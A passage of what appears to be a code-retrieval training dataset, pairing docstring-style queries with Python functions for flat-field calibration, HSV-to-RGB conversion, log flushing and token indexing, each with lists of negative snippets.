"def apply_flat_field(science, flat):\n\n # Extract subarray from reference data, if necessary\n if reffile_utils.ref_matches_sci(science, flat):\n flat_data = flat.data\n flat_dq = flat.dq\n else:\n log.info(\"Extracting matching subarray from flat\")\n sub_flat = get_subarray_model(science, flat)\n flat_data = sub_flat.data.copy()\n flat_dq = sub_flat.dq.copy()\n sub_flat.close()\n\n # Find pixels in the flat that have a value of NaN and set\n # their DQ to NO_FLAT_FIELD\n flat_nan = np.isnan(flat_data)\n flat_dq[flat_nan] = np.bitwise_or(flat_dq[flat_nan], dqflags.pixel[\"NO_FLAT_FIELD\"])\n\n # Find pixels in the flat have have a value of zero, and set\n # their DQ to NO_FLAT_FIELD\n flat_zero = np.where(flat_data == 0.0)\n flat_dq[flat_zero] = np.bitwise_or(\n flat_dq[flat_zero], dqflags.pixel[\"NO_FLAT_FIELD\"]\n )\n\n # Find all pixels in the flat that have a DQ value of NO_FLAT_FIELD\n flat_bad = np.bitwise_and(flat_dq, dqflags.pixel[\"NO_FLAT_FIELD\"])\n\n # Reset the flat value of all bad pixels to 1.0, so that no\n # correction is made\n flat_data[np.where(flat_bad)] = 1.0\n\n # For CubeModel science data, apply flat to each integration\n if isinstance(science, datamodels.CubeModel):\n for integ in range(science.data.shape[0]):\n # Flatten data and error arrays\n science.data[integ] /= flat_data\n science.err[integ] /= flat_data\n # Combine the science and flat DQ arrays\n science.dq[integ] = np.bitwise_or(science.dq[integ], flat_dq)\n\n # For 2D ImageModel science data, apply flat to entire arrays\n else:\n # Flatten data and error arrays\n science.data /= flat_data\n science.err /= flat_data\n\n # Combine the science and flat DQ arrays\n science.dq = np.bitwise_or(science.dq, flat_dq)",
"def getflat(self):\n\n # The keyword for WFPC2 flat fields in the primary header of the flt\n # file is FLATFILE. This flat file is *not* already in the required \n # units of electrons.\n \n filename = self.header['FLATFILE']\n \n try:\n handle = fileutil.openImage(filename,mode='readonly',writefits=False,memmap=0)\n hdu = fileutil.getExtn(handle,extn=self.grp)\n data = hdu.data[self.ltv2:self.size2,self.ltv1:self.size1]\n except:\n try:\n handle = fileutil.openImage(filename[5:],mode='readonly',writefits=False,memmap=0)\n hdu = fileutil.getExtn(handle,extn=self.grp)\n data = hdu.data[self.ltv2:self.size2,self.ltv1:self.size1]\n except:\n data = np.ones(self.image_shape,dtype=self.image_dtype)\n str = \"Cannot find file \"+filename+\". Treating flatfield constant value of '1'.\\n\"\n print str\n # For the WFPC2 flat we need to invert\n # for use in Multidrizzle\n flat = (1.0/data)\n return flat",
"def add_flat_field(self, PSF_image, flat_delta):\n\n pix, N_chan = PSF_image.shape[0], PSF_image.shape[-1]\n new_PSF = np.zeros_like(PSF_image)\n # print(r\"Adding Flat Field errors [1 - $\\delta$, 1 + $\\delta$]: $\\delta$=%.3f\" % flat_delta)\n # sigma_uniform = flat_delta / np.sqrt(3)\n flat_field = np.random.uniform(low=1 - flat_delta, high=1 + flat_delta, size=(pix, pix))\n for j in range(N_chan):\n new_PSF[:, :, j] = flat_field * PSF_image[:, :, j]\n\n return new_PSF",
"def calculate_flat_field(images):\n\n _, height, _ = images.shape\n print(images.shape)\n filter_sigma = height // 16\n flat_field = gaussian_filter(normalize_and_convert_to_16_bit(np.median(images, axis = 0)), filter_sigma)\n \n print(flat_field.shape)\n return flat_field",
"def do_flat_field(output_model, flat_model):\n\n log.debug(\"Flat field correction \")\n\n any_updated = False # will set True if any flats applied\n\n # Check to see if flat data array is smaller than science data\n if (output_model.data.shape[-1] > flat_model.data.shape[-1]) or (\n output_model.data.shape[-2] > flat_model.data.shape[-2]\n ):\n log.warning(\"Reference data array is smaller than science data\")\n log.warning(\"Step will be skipped\")\n\n # Apply flat to all other models\n else:\n apply_flat_field(output_model, flat_model)\n any_updated = True\n\n if any_updated:\n output_model.meta.cal_step.flat_field = \"COMPLETE\"\n else:\n output_model.meta.cal_step.flat_field = \"SKIPPED\"",
"def make_average_flat_for_grism():\n \n os.chdir('/Users/gbrammer/CANDELS/Flats/')\n f125 = pyfits.open('flat.F125W.fits')\n f160 = pyfits.open('flat.F160W.fits')\n \n avg = f125[1].data*0.5+f160[1].data*0.5\n \n f125[1].data = avg\n f125.writeto('flat.IR_avg.fits', clobber=True)",
"def get_flatfield(n_integrations, n_spatial):\n\n # load the flatfield, interpolate if required using the 133-bin flatfield\n if n_spatial == 133:\n detector_flat = np.load(_os.path.join(pkg_resources.resource_filename('maven_iuvs', 'ancillary/'),\n 'mvn_iuv_flatfield-133spa-muv.npy'))[:, :18]\n elif n_spatial == 50:\n detector_flat = np.load(_os.path.join(pkg_resources.resource_filename('maven_iuvs', 'ancillary/'),\n 'mvn_iuv_flatfield-50spa-muv.npy'))[:, :18]\n else:\n detector_full = np.load(_os.path.join(pkg_resources.resource_filename('maven_iuvs', 'ancillary/'),\n 'mvn_iuv_flatfield-133spa-muv.npy'))[:, :18]\n detector_flat = np.zeros((n_spatial, 18))\n for i in range(18):\n detector_flat[:, i] = np.interp(np.linspace(0, 132, n_spatial), np.arange(133), detector_full[:, i])\n\n # create a flatfield for the given number of integrations\n flatfield = np.repeat(detector_flat[None, :], n_integrations, axis=0)\n\n # return the stacked flatfield\n return flatfield",
"def hrsflat(rawpath, outpath, detname, obsmode, master_bias=None, f_limit=1000, first_order=53, \n y_start=30, y_limit=3920, smooth_length=20, smooth_fraction=0.4, filter_size=151,\n link=False, sdb=None, clobber=True):\n if not os.path.isdir(rawpath): return\n\n image_list = ImageFileCollection(rawpath)\n if len(image_list.files)==0: return\n\n #make output directory\n if not os.path.isdir(outpath): os.mkdir(outpath)\n\n #get the observing date\n obsdate=get_obsdate(image_list.summary['file'][0])\n\n #setup the instrument prefix\n \n if detname=='HRDET':\n prefix='R'\n process = red_process\n rdnoise=6.81*u.electron\n elif detname=='HBDET':\n prefix='H'\n process = blue_process\n rdnoise=7.11*u.electron\n else:\n raise ValueError('detname must be a valid HRS Detector name')\n\n #process the flat frames\n matches = (image_list.summary['obstype'] == 'Flat field') * (image_list.summary['detnam'] == detname) * (image_list.summary['obsmode'] == obsmode) * (image_list.summary['propid'] != 'JUNK')\n flat_list = []\n for fname in image_list.summary['file'][matches]:\n logging.info('Processing flat image {}'.format(fname))\n ccd = process(rawpath+fname, masterbias=master_bias, error=True, rdnoise=rdnoise)\n flat_list.append(ccd)\n if sdb is not None: dq_ccd_insert(rawpath + fname, sdb)\n\n if flat_list:\n outfile = \"{0}/{2}FLAT_{1}_{3}.fits\".format(outpath, obsdate, prefix, obsmode.replace(' ', '_'))\n logging.info('Created master flat {}'.format(os.path.basename(outfile)))\n if os.path.isfile(outfile) and clobber: os.remove(outfile)\n flat = ccdproc.combine(flat_list, method='median', output_file=outfile)\n\n norm = clean_flatimage(flat.data, filter_size=filter_size, flux_limit=0.3,\n block_size=100, percentile_low=30, median_size=5)\n\n norm[norm>0]=1\n if detname=='HRDET':\n xc = 1947 #int(xs/2.0)\n detect_kern = norm[1:100, xc]\n #these remove light that has bleed at the edges and may need adjusting\n norm[:,:20]=0\n norm[:,4040:]=0\n elif detname=='HBDET':\n ys, xs = norm.shape\n xc = int(xs/2.0)\n detect_kern = norm[32:110, xc]\n\n frame = create_orderframe(norm, first_order, xc, detect_kern, smooth_length=smooth_length, \n smooth_fraction=smooth_fraction, y_start=y_start, y_limit=y_limit)\n order_file = \"{0}/{2}ORDER_{1}_{3}.fits\".format(outpath, obsdate, prefix, obsmode.replace(' ', '_'))\n logging.info('Created order frame {}'.format(os.path.basename(order_file)))\n hdu = fits.PrimaryHDU(frame)\n hdu.writeto(order_file, clobber=True)\n if sdb: dq_order_insert(order_file, sdb)\n\n if link:\n link='/salt/HRS_Cals/CAL_FLAT/{0}/{1}/product/{2}'.format(obsdate[0:4], obsdate[4:8], os.path.basename(outfile))\n if os.path.islink(link) and clobber: os.remove(link)\n print(outfile)\n print(link)\n os.symlink(outfile, link)\n olink='/salt/HRS_Cals/CAL_FLAT/{0}/{1}/product/{2}'.format(obsdate[0:4], obsdate[4:8], os.path.basename(order_file))\n if os.path.islink(olink) and clobber: os.remove(olink)\n os.symlink(order_file, olink)",
"def run_make_camera_flat(self):\n outfile = 'camera_flat.fits'\n img_list = []\n for k in self.obs_dict:\n if self.obs_dict[k][1] == 'CAMERA': img_list.append(self.obs_dict[k][0])\n print img_list\n logging.info('\\nCreate a new camera flat with name %s\\n' % outfile) \n gr.make_camera_flat(img_list, outfile)",
"def reshape_flat_field(self, f = None):\n\n if f is None:\n if self.data.ndim == 2:\n new_shape = [self.data.shape[0]] + list((self.lats.shape[0], self.lons.shape[0]))\n self.data = np.reshape(self.data, new_shape)\n else:\n raise Exception('Data field is not flattened, is multi-level or is only temporal (e.g. station)!')\n\n elif f is not None:\n if f.ndim == 2:\n new_shape = [f.shape[0]] + list((self.lats.shape[0], self.lons.shape[0]))\n f = np.reshape(f, new_shape)\n\n return f\n else:\n raise Exception('The field f is not flattened, is multi-level or is only temporal (e.g. station)!')",
"def fill_triangle(tr, art_img, new_img):\n r = cv2.boundingRect(np.float32([tr]))\n t_rec = []\n for i in xrange(0, 3):\n t_rec.append(((tr[i][0] - r[0]),(tr[i][1] - r[1])))\n \n \n mask = np.zeros((r[3], r[2]), dtype = np.float32)\n cv2.fillConvexPoly(mask, np.int32(t_rec), (1.0, 1.0, 1.0), 16, 0);\n art_img_patch = art_img[r[1]:r[1]+r[3], r[0]:r[0]+r[2]]\n\n kx, ky = np.where(mask == 1)\n vals = np.mean(art_img_patch[kx,ky,:], axis=0).astype('int')\n \n #print art_img_patch.shape\n new_img[r[1]:r[1]+r[3], r[0]:r[0]+r[2]][kx,ky,:] = vals[None,None,:] #* (mask[:,:,None])\n #art_img_patch * (mask[:,:,None] ) + ",
"def get_master_flat(filt, infiles=None, name_template=\"Flat-????_{}.fit\", calib_folder=\"\"):\n if filt.lower() in ['h', 'halpha', 'h_alpha', 'ha', 'h_a']:\n filt = 'H'\n elif filt.lower() in ['o', 'oiii', 'o3', 'o_iii', 'o_3']:\n filt = 'O'\n\n test_presence = glob(\"{0:s}master_flat_{1:s}.fits\".format(calib_folder,filt))\n if (len(test_presence)>=1.) and (infiles is None):\n with fits.open(test_presence[0]) as f:\n master_flat_data = f[0].data\n else:\n if infiles is None:\n name_template = name_template.format(filt)\n infiles = []\n for file in glob(\"{0:s}{1:s}\".format(calib_folder,name_template)):\n infiles.append(file[len(calib_folder):])\n data_array, headers = proj_fits.get_obs_data(infiles, data_folder=calib_folder, compute_flux=False)\n # Get Master Darks and Bias\n dark = {}\n for i,head in enumerate(headers):\n dark[head['exptime']] = get_master_dark(head['exptime'], calib_folder=calib_folder)\n bias = get_master_bias(calib_folder=calib_folder)\n # Compute temporary flat\n flat = []\n for i,data in enumerate(data_array):\n flat.append(data-bias-dark[headers[i]['exptime']])\n flat = np.median(flat, axis=0)\n flat += np.median(flat)\n master_flat_data = flat/np.median(flat)\n # Save to fits for next time\n master_flat_header = headers[0].copy()\n master_flat_header.remove('OBJECT')\n master_flat_header['CCD-TEMP'] = np.mean([hdr['CCD-TEMP'] for hdr in headers])\n master_flat_header['IMAGETYP'] = \"Master Flat\"\n master_flat_header.add_history(\"Cal Master Flat {0:s}, {1:d} inputs\".format(filt, data_array.shape[0]))\n hdu = fits.PrimaryHDU(data=master_flat_data, header=master_flat_header)\n hdul = fits.HDUList([hdu])\n hdul.writeto(\"{0:s}master_flat_{1:s}.fits\".format(calib_folder, filt))\n\n return master_flat_data",
"def flat_field_correction(proj, flat, dark, ratio=1.0, use_dark=True,\n **options):\n msg = \"\\n Please use the dictionary format: options={'method':\" \\\n \" 'filter_name', 'para1': parameter_1, 'para2': parameter_2}\"\n flat = ratio * flat\n if use_dark:\n flat_dark = flat - dark\n if 0.0 in flat_dark:\n nmean = np.mean(flat_dark)\n if nmean != 0.0:\n flat_dark[flat_dark == 0.0] = nmean\n else:\n flat_dark[flat_dark == 0.0] = 1\n proj_corr = (np.float32(proj) - dark) / flat_dark\n else:\n proj_corr = (np.float32(proj) - dark) / flat_dark\n else:\n if 0.0 in flat:\n nmean = np.mean(flat)\n if nmean != 0.0:\n flat[flat == 0.0] = nmean\n else:\n flat[flat == 0.0] = 1\n proj_corr = np.float32(proj) / flat\n else:\n proj_corr = np.float32(proj) / flat\n if len(options) != 0:\n for opt_name in options:\n opt = options[opt_name]\n if isinstance(opt, dict):\n method = tuple(opt.values())[0]\n para = tuple(opt.values())[1:]\n if proj_corr.ndim == 2:\n if method in dir(remo):\n proj_corr = getattr(remo, method)(proj_corr, *para)\n elif method in dir(filt):\n proj_corr = getattr(filt, method)(proj_corr, *para)\n elif method in dir(ps):\n proj_corr = getattr(ps, method)(proj_corr, *para)\n else:\n raise ValueError(\"Can't find the method: '{}' in\"\n \" the namespace\".format(method))\n else:\n for i in np.arange(proj_corr.shape[1]):\n if method in dir(remo):\n proj_corr[:, i, :] = getattr(remo, method)(\n proj_corr[:, i, :], *para)\n elif method in dir(filt):\n proj_corr[:, i, :] = getattr(filt, method)(\n proj_corr[:, i, :], *para)\n elif method in dir(ps):\n proj_corr[:, i, :] = getattr(ps, method)(\n proj_corr[:, i, :], *para)\n else:\n raise ValueError(\"Can't find the method: '{}' in \"\n \"the namespace\".format(method))\n else:\n if opt is not None:\n raise ValueError(msg)\n return proj_corr",
"def fancyConvert(image):",
"def applyFlatField(data,chanList=[]):\n\n # get channel list\n chanList = data.BolometerArray.checkChanList(chanList)\n\n if len(chanList)<1: \n data.MessHand.error(\"no valid channel\")\n return\n\n for chan in chanList:\n num = data.BolometerArray.getChanIndex(chan)[0]\n numGain = chan-1\n data.Data[:,num] = data.Data[:,num] / array((data.BolometerArray.Gain[numGain]),'f')\n \n data._DataAna__resetStatistics()",
"def itkImageFAF33_cast(obj: 'itkLightObject') -> \"itkImageFAF33 *\":\n return _itkImagePython.itkImageFAF33_cast(obj)",
"def flatten_field(self, f = None):\n\n if f is None:\n if self.data.ndim == 3:\n self.data = np.reshape(self.data, (self.data.shape[0], np.prod(self.data.shape[1:])))\n else:\n raise Exception('Data field is already flattened, multi-level or only temporal (e.g. station)!')\n\n elif f is not None:\n if f.ndim == 3:\n f = np.reshape(f, (f.shape[0], np.prod(f.shape[1:])))\n\n return f\n else:\n raise Exception('The field f is already flattened, multi-level or only temporal (e.g. station)!')",
"def _set_flt_info(self):\n try:\n flfn = self.flts[0]\n self.fl_header = hdr = fits.getheader(flfn, 0)\n except IOError:\n flfn = self.flcs[0]\n self.fl_header = hdr = fits.getheader(flfn, 0)\n\n\n f1, f2 = (hdr['FILTER1'], hdr['FILTER2'])\n if f1.lstrip().lower().startswith('clear'):\n self.filter = f2.strip()\n elif f2.lstrip().lower().startswith('clear'):\n self.filter = f1.strip()\n else:\n self.filter = f1.strip() + '-' + f2.strip()",
"def applyFastToneMapping(\n self, inputImage, outputToneMappedImage=...\n ) -> outputToneMappedImage:\n ..."
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
HSV values in [0..1[ Returns [r, g, b] values from 0 to max inclusive
|
def hsv_to_rgb(h, s, v, max):
h_i = int(h * 6)
f = h * 6 - h_i
p = v * (1 - s)
q = v * (1 - f * s)
t = v * (1 - (1 - f) * s)
if h_i == 0:
r, g, b = v, t, p
elif h_i == 1:
r, g, b = q, v, p
elif h_i == 2:
r, g, b = p, v, t
elif h_i == 3:
r, g, b = p, q, v
elif h_i == 4:
r, g, b = t, p, v
elif h_i == 5:
r, g, b = v, p, q
return int(r * max + 1), int(g * max + 1), int(b * max + 1)
|
[
"def num_to_hsv(value):\n return cv2.cvtColor(np.uint8([[num_to_bgr(value)]]), cv2.COLOR_BGR2HSV)",
"def hsv_to_rgb(h, s, v):\n if s == 0.0:\n return v, v, v\n\n i = int(h * 6.0) # XXX assume int() truncates!\n\n f = (h * 6.0) - i\n p, q, t = v * (1.0 - s), v * (1.0 - s * f), v * (1.0 - s * (1.0 - f))\n i %= 6\n\n if i == 0:\n return v, t, p\n\n if i == 1:\n return q, v, p\n\n if i == 2:\n return p, v, t\n\n if i == 3:\n return p, q, v\n\n if i == 4:\n return t, p, v\n\n if i == 5:\n return v, p, q",
"def getColor(rgb=None, hsv=None):\n # recursion, return a list if input is list of colors:\n if _isSequence(rgb) and (len(rgb) > 3 or _isSequence(rgb[0])):\n seqcol = []\n for sc in rgb:\n seqcol.append(getColor(sc))\n return seqcol\n\n # because they are most common:\n if rgb=='r':\n return (0.9960784313725, 0.11764705882352, 0.121568627450980)\n elif rgb=='g':\n return (0.0156862745098, 0.49803921568627, 0.062745098039215)\n elif rgb=='b':\n return (0.0588235294117, 0.0, 0.984313725490196)\n\n if str(rgb).isdigit():\n rgb = int(rgb)\n\n if hsv:\n c = hsv2rgb(hsv)\n else:\n c = rgb\n\n if _isSequence(c):\n if c[0] <= 1 and c[1] <= 1 and c[2] <= 1:\n return c # already rgb\n else:\n if len(c) == 3:\n return list(np.array(c) / 255.0) # RGB\n else:\n return (c[0] / 255.0, c[1] / 255.0, c[2] / 255.0, c[3]) # RGBA\n\n elif isinstance(c, str): # is string\n c = c.replace(\"grey\", \"gray\").replace(\" \", \"\")\n if 0 < len(c) < 3: # single/double letter color\n if c.lower() in color_nicks.keys():\n c = color_nicks[c.lower()]\n else:\n vedo.logger.warning(f\"Unknown color nickname {c}\\nAvailable abbreviations: {color_nicks}\")\n return (0.5, 0.5, 0.5)\n\n if c.lower() in colors.keys(): # matplotlib name color\n c = colors[c.lower()]\n # from now format is hex!\n\n if c.startswith(\"#\"): # hex to rgb\n h = c.lstrip(\"#\")\n rgb255 = list(int(h[i : i + 2], 16) for i in (0, 2, 4))\n rgbh = np.array(rgb255) / 255.0\n if np.sum(rgbh) > 3:\n vedo.logger.error(f\"in getColor(): Wrong hex color {c}\")\n return (0.5, 0.5, 0.5)\n return tuple(rgbh)\n\n else: # vtk name color\n namedColors = vtk.vtkNamedColors()\n rgba = [0, 0, 0, 0]\n namedColors.GetColor(c, rgba)\n return (rgba[0]/255.0, rgba[1]/255.0, rgba[2]/255.0)\n\n elif isinstance(c, int): # color number\n if c >= 0:\n return colors1[c % 10]\n else:\n return colors2[-c % 10]\n\n elif isinstance(c, float):\n if c >= 0:\n return colors1[int(c) % 10]\n else:\n return colors2[int(-c) % 10]\n\n # print(\"Unknown color:\", c)\n return (0.5, 0.5, 0.5)",
"def hsv2rgb(hsv):\n ma = vtk.vtkMath()\n rgb = [0,0,0]\n ma.HSVToRGB(hsv, rgb)\n return rgb",
"def hsv(n=63):\n\n return colors.hsv_to_rgb(np.column_stack([np.linspace(0, 1, n + 1), np.ones(((n + 1), 2))]))",
"def hsv_color_range(image, points, padding=0):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n color_list = []\n for point in points:\n color = image[point[0], point[1]][:3]\n color_list.append(color)\n color_list = np.asarray(color_list)\n max = np.array([color_list[:, 0].max(), \n color_list[:, 1].max(), \n color_list[:, 2].max()])\n low = np.array([color_list[:, 0].min(), \n color_list[:, 1].min(),\n color_list[:, 2].min(),])\n \n return max, low",
"def hsv2rgb(hsv):\n import matplotlib as mpl\n\n mpl.use(\"Agg\")\n rgb = mpl.colors.hsv_to_rgb(hsv)\n return rgb",
"def get_rgb_from_value(v: float) -> Tuple[int, int, int]:\n # colorsys returns rgb values between 0 and 1\n r, g, b = colorsys.hls_to_rgb(v, 0.5, 1)\n\n # multiply by 255 to get values between 0 and 255\n red = round(r * 255)\n green = round(g * 255)\n blue = round(b * 255)\n return red, green, blue",
"def r2h(img):\n return cv.cvtColor(img,cv.COLOR_RGB2HSV)",
"def hue2clr(hue):\n num = len(hue)\n\n #print 'hue=',hue\n #print 'hue.shape=',hue.shape\n\n rgb = n.zeros([hue.shape[0],3])\n\n #print 'rgb =', rgb\n\n\n for k in range(0,num):\n\n\tif (hue[k] >= 0) & (hue[k] < 0.167):\n\n\t rgb[k,0] = 1\n\t rgb[k,1] = hue[k]/0.167\n\n\telif (hue[k]>= 0.167) & (hue[k] < 0.333):\n\n\t rgb[k,0] = 1-(hue[k]-0.167)/0.167\n\t rgb[k,1] = 1\n\n\telif (hue[k] >= 0.333) & (hue[k] < 0.500):\n\n\t rgb[k,1] = 1\n\t rgb[k,2] = (hue[k]-0.333)/0.167\n\n\telif (hue[k] >= 0.500) & (hue[k] < 0.667):\n\n\t rgb[k,1] = 1-(hue[k]-0.500)/0.167\n\t rgb[k,2] = 1\n\n\telif (hue[k] >= 0.667) & (hue[k] < 0.883):\n\n\t rgb[k,0] = (hue[k]-0.667)/0.167\n\t rgb[k,2] = 1\n\n\telif (hue[k] >= 0.883) & (hue[k] <= 1):\n\n\t rgb[k,0] = 1\n\t rgb[k,2] = 1-(hue[k]-0.883)/0.167\n\n\t#print 'k=',k\n\t#print 'rgb=',rgb\n return rgb",
"def upper_lower_bounds_hsv(value):\n h = num_to_h(value)\n return np.uint8([[[h - 48, 50, 50]]]), np.uint8([[[h + 48, 255, 255]]])",
"def hsv_to_rgb(hsv):\n hsv = np.asarray(hsv)\n\n # check length of the last dimension, should be _some_ sort of rgb\n if hsv.shape[-1] != 3:\n raise ValueError(\"Last dimension of input array must be 3; \"\n \"shape {shp} was found.\".format(shp=hsv.shape))\n\n # if we got pased a 1D array, try to treat as\n # a single color and reshape as needed\n in_ndim = hsv.ndim\n if in_ndim == 1:\n hsv = np.array(hsv, ndmin=2)\n\n # make sure we don't have an int image\n if hsv.dtype.kind in ('iu'):\n hsv = hsv.astype(np.float32)\n\n h = hsv[..., 0]\n s = hsv[..., 1]\n v = hsv[..., 2]\n\n r = np.empty_like(h)\n g = np.empty_like(h)\n b = np.empty_like(h)\n\n i = (h * 6.0).astype(np.int)\n f = (h * 6.0) - i\n p = v * (1.0 - s)\n q = v * (1.0 - s * f)\n t = v * (1.0 - s * (1.0 - f))\n\n idx = i % 6 == 0\n r[idx] = v[idx]\n g[idx] = t[idx]\n b[idx] = p[idx]\n\n idx = i == 1\n r[idx] = q[idx]\n g[idx] = v[idx]\n b[idx] = p[idx]\n\n idx = i == 2\n r[idx] = p[idx]\n g[idx] = v[idx]\n b[idx] = t[idx]\n\n idx = i == 3\n r[idx] = p[idx]\n g[idx] = q[idx]\n b[idx] = v[idx]\n\n idx = i == 4\n r[idx] = t[idx]\n g[idx] = p[idx]\n b[idx] = v[idx]\n\n idx = i == 5\n r[idx] = v[idx]\n g[idx] = p[idx]\n b[idx] = q[idx]\n\n idx = s == 0\n r[idx] = v[idx]\n g[idx] = v[idx]\n b[idx] = v[idx]\n\n rgb = np.empty_like(hsv)\n rgb[..., 0] = r\n rgb[..., 1] = g\n rgb[..., 2] = b\n\n if in_ndim == 1:\n rgb.shape = (3, )\n\n return rgb",
"def color_picker(n, min_h=0, max_h=0.85, s=1.00, v=0.75, alternate=True):\n # for fewer samples, select nearby colors\n steps = max(n, 8)\n\n hues = np.linspace(min_h, max_h, steps).tolist()[0:n]\n if alternate:\n m = ceil(len(hues) / 2)\n h1 = hues[:m]\n h2 = hues[m:]\n hues[::2] = h1\n hues[1::2] = h2\n\n hsv_colors_list = [(h, s, v) for h in hues]\n return hsv_colors_list",
"def equalizev(img):\n h,s,v = cv.split(cv.cvtColor(img,cv.COLOR_RGB2HSV))\n v=equalize(v)\n return cv.cvtColor(cv.merge([h,s,v]),cv.COLOR_HSV2RGB)",
"def to_hsv( color ):\n color=colorsys.rgb_to_hsv(*[x/255.0 for x in color])\n print(\"color in hsv: \",color)\n return (color) #rgb_to_hsv wants floats!",
"def detect_red(hsv_image, min_size, change_to_white):\n\n hsv_boundary = ([165, 100, 100], [10, 255, 255])\n\n centre_array = detect_colour(hsv_image, hsv_boundary, min_size, change_to_white)\n\n return centre_array",
"def rgb2hsv(rgb):\n ma = vtk.vtkMath()\n hsv = [0,0,0]\n ma.RGBToHSV(getColor(rgb), hsv)\n return hsv",
"def gen_color():\n import colorsys\n golden_ratio = 0.618033988749895\n h = 0.22717784590367374\n\n while 1:\n h += golden_ratio\n h %= 1\n HSV_tuple = [h, 0.95, 0.95] # this defines how \"deep\" are the colors\n RGB_tuple = colorsys.hsv_to_rgb(*HSV_tuple)\n yield map(lambda x:str(int(x * 256)), RGB_tuple)",
"def hsvSpace(imagePath):\n img=cv2.imread (imagePath)\n return cv2.cvtColor(img, cv2.COLOR_BGR2HSV)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Flush the given logs time frame. So that all of its entries is printed through the given output.
|
def _flush_frame(logs, output):
for timestamp in sorted(logs):
entries = logs[timestamp]
(level, color, pkrid, process, source, logger, log) = entries[0]
try:
lcolor = LEVEL_COLORS[level]
except KeyError:
lcolor = LEVEL_COLORS['E']
lcolor = 16 + 36 * lcolor[0] + 6 * lcolor[1] + lcolor[2]
color = 16 + 36 * color[0] + 6 * color[1] + color[2]
# print the first line with the timestamp
output.write("\033[38;5;%dm" % lcolor)
output.write("%s|" % level)
output.write(timestamp)
output.write("|\033[38;5;%dm%s:%s|%s|%s|%s\033[39m\n"
% (color, pkrid, process, source, logger, log))
dots = "." * len(timestamp)
# then print all remaining lines (for the considered timestamp)
for (level, color, pkrid, process, source, logger, log) in entries[1:]:
lcolor = LEVEL_COLORS[level]
lcolor = 16 + 36 * lcolor[0] + 6 * lcolor[1] + lcolor[2]
output.write("\033[38;5;%dm" % lcolor)
output.write("%s|%s" % (level, dots))
output.write("|\033[38;5;%sm%s:%s|%s|%s|%s\033[39m\n"
% (color, pkrid, process, source, logger, log))
|
[
"def flush(self) -> None:\n for handler in self.logger.handlers:\n handler.flush()",
"def flush():\n\n if stdout != NULL:\n fflush(stdout)",
"def flush(self):\n self._output_flush()",
"def flush():\n actual_flush()",
"def _flush_streams(self):\n sys.stdout.flush()\n sys.stderr.flush()",
"def print_flush(s):\n print s\n sys.stdout.flush()",
"def flush(self):\n if not self.pynba or not self.pynba.enabled:\n return\n\n self.pynba.stop()\n timers = [timer for timer in self.pynba.timers if timer.elapsed]\n document_size = self.pynba.document_size\n memory_peak = self.pynba.memory_peak\n usage = resource.getrusage(resource.RUSAGE_SELF)\n ru_utime = usage.ru_utime - self.resources.ru_utime\n ru_stime = usage.ru_stime - self.resources.ru_stime\n\n self.reporter(\n servername= self.servername,\n hostname= self.pynba.hostname,\n scriptname= self.scriptname,\n elapsed= self.pynba.elapsed,\n timers= timers,\n ru_utime= ru_utime,\n ru_stime= ru_stime,\n document_size= document_size,\n memory_peak= memory_peak\n )\n\n self.pynba.flush()",
"def log_fps(frames, timediff):\n if timediff < 1 or frames == 0 or (frames % 100) != 0:\n return\n # Print message each 1000 frame if FPS > 100\n if frames > 100 * timediff and (frames % 1000) != 0:\n return\n logger.info('Frame {:6d}: FPS {}'.format(frames, int(frames / timediff)))",
"def _flush_metadata(self, force_flush: bool = False) -> None:\n if self._enabled and (time.time() - self.time_last_logged > self.log_interval or force_flush):\n try:\n mcli.update_run_metadata(self.run_name, self.buffered_metadata)\n self.buffered_metadata = {}\n self.time_last_logged = time.time()\n except mcli.MAPIException as e:\n log.error(f'Failed to log metadata to Mosaic with error: {e}')",
"def print_cache() -> None:\n logger.info(CLEAR_TERMINAL)\n for log_level, line in logger.output_cache:\n logger.log(log_level, line)",
"def flush_output_buffer(self):\n\t\tself.ser.flushOutput()",
"def timer_flush_all(self):\n th = threading.Timer(self._thread_delay, self.flush_all)\n th.start()",
"def _shutdown_logger(logger):\n\n for handler in logger.handlers:\n handler.flush()\n handler.close()",
"def log(text):\n if LOG:\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n print(f\"[{current_time}] {text}\")",
"def flush_stdout_stderr() -> None:\n sys.stdout.flush()\n sys.stderr.flush()",
"def stream_logs(container, stdout=True, stderr=True, tail='all', timeout=10.0):\n deadline = get_time() + timeout\n\n with _haxxed_mrsh(container):\n resp, sock = container.logs(\n stdout=stdout, stderr=stderr, stream=True, tail=tail, follow=True)\n try:\n while True:\n try:\n yield read_frame(resp, sock, deadline)\n except SocketClosed:\n return\n finally:\n # We also need to close the response object to avoid leaking any\n # resources.\n resp.close()",
"def log_every(self, iterable, print_freq=1, row_header=\"\", header=\"\", metrics_format=\"\", delimiter=\"\\t\",\n log_steps=True, log_time=True, file=None):\n section = self.start_section(row_header=row_header, header=header, metrics_format=metrics_format,\n delimiter=delimiter, log_steps=log_steps, log_time=log_time, total=len(iterable))\n section.print_header(file=file)\n step = 0\n for obj in iterable:\n yield obj\n section.step_end()\n step += 1\n if print_freq and (step % print_freq == 0 or step == len(iterable)):\n self.sections[-1].print_row(file=file)\n section.print_footer(file=file)",
"def print_end(self):\n self.time_writer('Time at the end of the Spider: %s'\n % str(datetime.now()))",
"def log_updated(self):\n self.console.update_log(self.temp_stream)\n # we need to repaint, otherwise graceful shutdown messages not visible\n self.__repaint()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Converts a list of examples of pairs of tokens into the corresponding indices according to the given Vocabulary.
|
def examples_to_indices(
examples: list[tuple[str, str]], vocab: Vocabulary
) -> list[tuple[int, int]]:
# zip(*...) "unzips" the list of tuples into a tuple of lists
targets, contexts = zip(*examples)
target_indices = vocab.tokens_to_indices(targets)
context_indices = vocab.tokens_to_indices(contexts)
# zip back together to get the right pairs
return list(zip(target_indices, context_indices))
|
[
"def tokens_from_index_list(index_list, id2vocab):\n token_list = []\n for i in range(len(index_list)):\n if index_list[i] > len(id2vocab)-1:\n token_list.append(\"<UNK>\")\n else:\n token_list.append(id2vocab[index_list[i]])\n return token_list",
"def sentences2idx(sentences, words):\n seq1 = []\n for i in sentences:\n seq1.append(getSeq(i,words))\n x1,m1 = prepare_data(seq1)\n return x1, m1",
